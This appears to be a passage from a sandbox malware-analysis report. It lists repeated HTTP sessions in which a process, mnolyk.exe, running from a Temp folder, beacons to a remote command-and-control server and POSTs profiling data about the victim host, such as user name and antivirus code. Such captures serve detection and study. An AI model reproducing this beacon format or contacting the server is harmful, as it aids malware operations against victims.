                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            288192.168.2.44998362.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            TimestampkBytes transferredDirectionData
                            Feb 8, 2023 17:38:50.645662069 CET477OUTPOST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:38:50.709820032 CET477INHTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:38:50 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            289192.168.2.44998462.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            TimestampkBytes transferredDirectionData
                            Feb 8, 2023 17:38:51.388411045 CET478OUTPOST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:38:51.453898907 CET478INHTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:38:51 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            29192.168.2.44972462.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            TimestampkBytes transferredDirectionData
                            Feb 8, 2023 17:37:31.965739965 CET218OUTPOST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:37:32.030860901 CET218INHTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:37:31 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            290192.168.2.44998562.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            TimestampkBytes transferredDirectionData
                            Feb 8, 2023 17:38:51.647161007 CET479OUTPOST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:38:51.711379051 CET479INHTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:38:51 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            291192.168.2.44998662.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            TimestampkBytes transferredDirectionData
                            Feb 8, 2023 17:38:51.969969034 CET480OUTPOST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:38:52.035185099 CET480INHTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:38:51 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            292192.168.2.44998762.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            TimestampkBytes transferredDirectionData
                            Feb 8, 2023 17:38:52.696926117 CET481OUTPOST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:38:52.760353088 CET481INHTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:38:52 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            293192.168.2.44998862.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            TimestampkBytes transferredDirectionData
                            Feb 8, 2023 17:38:53.036499977 CET482OUTPOST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:38:53.101223946 CET482INHTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:38:53 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            294192.168.2.44998962.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            TimestampkBytes transferredDirectionData
                            Feb 8, 2023 17:38:53.655632019 CET483OUTPOST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:38:53.718446016 CET483INHTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:38:53 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            295192.168.2.44999062.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            TimestampkBytes transferredDirectionData
                            Feb 8, 2023 17:38:53.902748108 CET484OUTPOST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:38:53.966175079 CET484INHTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:38:53 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            296192.168.2.44999162.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            TimestampkBytes transferredDirectionData
                            Feb 8, 2023 17:38:54.132076979 CET485OUTPOST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:38:54.197141886 CET485INHTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:38:54 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            297192.168.2.44999262.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            TimestampkBytes transferredDirectionData
                            Feb 8, 2023 17:38:54.369069099 CET486OUTPOST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:38:54.435513020 CET486INHTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:38:54 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            298192.168.2.44999362.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            TimestampkBytes transferredDirectionData
                            Feb 8, 2023 17:38:54.619810104 CET487OUTPOST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:38:54.682399988 CET487INHTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:38:54 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            299192.168.2.44999462.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            TimestampkBytes transferredDirectionData
                            Feb 8, 2023 17:38:54.852514029 CET488OUTPOST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:38:54.917341948 CET488INHTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:38:54 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            3192.168.2.44969862.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            TimestampkBytes transferredDirectionData
                            Feb 8, 2023 17:37:25.130949974 CET169OUTPOST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:37:25.194020033 CET185INHTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:37:25 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            30192.168.2.44972562.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            TimestampkBytes transferredDirectionData
                            Feb 8, 2023 17:37:32.936275959 CET219OUTPOST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:37:33.002540112 CET219INHTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:37:32 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            300192.168.2.44999562.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            TimestampkBytes transferredDirectionData
                            Feb 8, 2023 17:38:55.087421894 CET489OUTPOST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:38:55.153852940 CET489INHTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:38:55 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            301192.168.2.44999662.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            TimestampkBytes transferredDirectionData
                            Feb 8, 2023 17:38:55.320993900 CET490OUTPOST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:38:55.386444092 CET490INHTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:38:55 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            302192.168.2.44999762.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            TimestampkBytes transferredDirectionData
                            Feb 8, 2023 17:38:55.560102940 CET491OUTPOST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:38:55.624541044 CET491INHTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:38:55 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            303192.168.2.44999862.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            TimestampkBytes transferredDirectionData
                            Feb 8, 2023 17:38:55.809592009 CET492OUTPOST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:38:55.872339010 CET492INHTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:38:55 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            304192.168.2.44999962.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            TimestampkBytes transferredDirectionData
                            Feb 8, 2023 17:38:56.038686037 CET493OUTPOST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:38:56.108273983 CET493INHTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:38:56 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            305192.168.2.45000062.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            TimestampkBytes transferredDirectionData
                            Feb 8, 2023 17:38:56.276222944 CET494OUTPOST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:38:56.340622902 CET494INHTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:38:56 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            306192.168.2.45000162.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            TimestampkBytes transferredDirectionData
                            Feb 8, 2023 17:38:56.508013964 CET495OUTPOST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
